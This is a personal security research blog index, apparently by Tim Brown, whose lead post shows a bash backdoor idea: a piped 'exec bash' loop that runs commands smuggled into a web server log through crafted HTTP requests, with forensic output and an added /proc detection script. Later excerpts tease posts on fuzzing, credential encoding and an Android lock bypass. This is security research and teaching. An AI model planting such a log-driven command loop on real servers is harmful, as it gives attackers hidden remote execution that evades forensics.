2022-09-19 00:00:00

By Tim Brown

Had some fun today, playing with ideas for fileless malware in bash. The general premise of this idea is that we can start a background process that sits, monitors an existing log file and then executes code based on what appears in the logs. For example, consider the following:

    $ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash

Now, what happens if we make a request to the corresponding web server:

    $ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'

As far as forensic artefacts go, there's not much to go on:

    $ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'
    $ ps -aef
    ...
    root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash
    root 11125 10680 17 21:27 pts/1 00:00:02 bash
    ...
    $ ls /proc/11125/fd
    total 0
    dr-x------ 2 root root 0 Jun 28 21:27 .
    dr-xr-xr-x 9 root root 0 Jun 28 21:27 ..
    lr-x------ 1 root root 64 Jun 28 21:28 0 -> pipe:[290558013]
    lrwx------ 1 root root 64 Jun 28 21:28 1 -> /dev/pts/1
    lrwx------ 1 root root 64 Jun 28 21:27 2 -> /dev/pts/1
    $ cat /proc/11125/cmdline
    bash
    $ cat /proc/11125/cwd
    /root

Things like exec/disown/patterns/eval add some fun options for further obfuscation...

Note that the examples given here are somewhat nobbled. Just in case anyone is confused, the point is the "| exec bash" rather than the payload specifics....
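As an added defender-side example (not code from the original post), the artefact pattern above turned into a check: a POSIX shell scan of a /proc-style tree that flags interpreter processes whose command line is the bare interpreter name and whose stdin (fd 0) is a pipe rather than a terminal or file. The sample tree builder, its PIDs and paths are constructed for illustration; pass /proc to scan a live host.

```shell
#!/bin/sh
# Flag interpreters that were fed their code over a pipe instead of from a script
# file: cmdline is just "bash"/"sh" (no script argument) and fd 0 is a pipe.
# Usage: find_pipe_fed_shells [PROC_ROOT]   (PROC_ROOT defaults to /proc)
find_pipe_fed_shells() {
    root="${1:-/proc}"
    for d in "$root"/[0-9]*; do
        [ -r "$d/cmdline" ] || continue
        # cmdline is NUL-separated; turn NULs into spaces and drop the trailing one
        cmd=$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null)
        cmd="${cmd% }"
        case "$cmd" in
            bash|sh|dash|zsh|/bin/bash|/bin/sh|/usr/bin/bash) ;;  # bare interpreter
            *) continue ;;                                        # has a script or other args
        esac
        stdin=$(readlink "$d/fd/0" 2>/dev/null) || continue
        case "$stdin" in
            pipe:*) printf '%s %s %s\n' "${d##*/}" "$cmd" "$stdin" ;;
        esac
    done
}

# Constructed sample tree (not a real /proc): one pipe-fed bare bash like the
# post's PID 11125, one interactive bash on a pty, one bash running a script file.
make_sample_tree() {
    t=$(mktemp -d)
    for pid in 11125 10680 4242; do mkdir -p "$t/$pid/fd"; done
    printf 'bash\0'                 > "$t/11125/cmdline"; ln -s 'pipe:[290558013]' "$t/11125/fd/0"
    printf '/bin/bash\0'            > "$t/10680/cmdline"; ln -s '/dev/pts/1'       "$t/10680/fd/0"
    printf 'bash\0/opt/backup.sh\0' > "$t/4242/cmdline";  ln -s 'pipe:[1]'         "$t/4242/fd/0"
    printf '%s\n' "$t"
}

# Demo on the constructed tree: prints only "11125 bash pipe:[290558013]"
sample=$(make_sample_tree)
find_pipe_fed_shells "$sample"
rm -rf "$sample"
```

On a real host a hit is only a lead, since legitimate tooling also pipes into shells; correlate the PID's parent, cwd and open files before acting.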

more

2017-03-17 02:30:01

By Tim Brown

It's been quite some time since I posted here but I thought I might try and resurrect this blog. Normal technical content will follow in due course but this post is a test of my new admin UI. Historically, Pontoon (and this site by extension) relied upon direct SQL updates, but I've just integrated http://crud-admin-generator.com/ which gives me a nice shiny UI from which I can make changes. Time will tell, but I'm hoping this will resurrect my interest in the platform....

more

2013-03-09 23:48:02

By Tim Brown

In my previous post on the Acer ChromeBook, I discussed the Crosh shell. Today I'm going to examine another default extension, one I mentioned previously as having caught my eye....

more

2013-01-07 03:12:12

By Tim Brown

After some fairly heavy advertising from Google, I was recently persuaded to stump up the cash for an Acer ChromeBook. This post discusses some of my initial observations....

more

2012-12-02 02:59:06

By Tim Brown

Background: A colleague asked me about fuzzing PHP. Verbatim from my email to security@php.net back in 2007:

I've been doing some work on fuzzing the PHP 4 and PHP 5 parsers and wanted to share my results with you. I know PHP 4 won't be supported for much longer and I have no idea whether any of these examples are directly exploitable however before I make them public I thought it was only right to give you a chance to comment. Feel free to ignore me if you so choose, but I'll be putting them up on my blog in 14 days unless I hear otherwise. Although I'm reporting them against the CGI binary, I've had similar results running these snippets against the module too. In each case, I can cause the process (either the CGI binary or the module) to crash. The fuzzers I've written are also available if you so wish.

...

more

2012-09-19 09:21:29

By Tim Brown

Disclaimer: I've only had a brief look at 1.x so far and only under VMware. I do have a PlayBook which I'll be breaking in due course but right now it's still in the box. These notes have been floating around in one form or another privately for a while but I wanted to commit them publicly since I'm not sure when I will find time to continue playing....

more

2011-07-31 22:33:26

By Tim Brown

So recently I had a penetration test where the client had a requirement to allow normal users to execute a specific command as a local admin. Normally, when I hear such a requirement my eyes light up as it can often be a quick way to get SYSTEM and then the domain. However, in this instance the client proudly told me about his underhanded method. Rather than use something like psexec, he'd discovered a nifty little utility called cpau which purported to encode the credentials to make it safe for use by normal users. Red rag to a bull, I decided to take a look; perhaps the encoding was weak and I could retrieve those all-important credentials....

more

2011-02-15 23:09:14

By Tim Brown

At the back end of last year I got a Sony Ericsson X10 only to discover that it was still running Android 1.6. This didn't bother me too much at the time as it had all the features I was after (web, SMS and voice) and I left it as it was. Recently, however, I've been getting into Android security, inspired first by Nils' talk at CRESTCon and more recently by some work for a client. Anyway, throughout this time I became aware of an issue that affects the X10. It seems that it is possible to bypass the pattern lock and gain access to data on a locked device. So how is this possible? Take a look at the following:...

more

2011-02-12 20:22:27

By Tim Brown

Recently a colleague and I were asked to give some training to some ASP.net developers. My colleague was asked to give the main training session whilst I was asked to run a post-training game to test the developers' retention of the concepts. After looking at some of the existing ASP.net applications I decided I'd like to write my own. The result of this is VulnApp, a BSD-licensed ASP.net application implementing some of the most common applications we come across on our penetration testing engagements. Whilst I'm not intending to package this up into a standalone install, today I committed the source to my CVS server so that others can, if they like, make use of it....

more
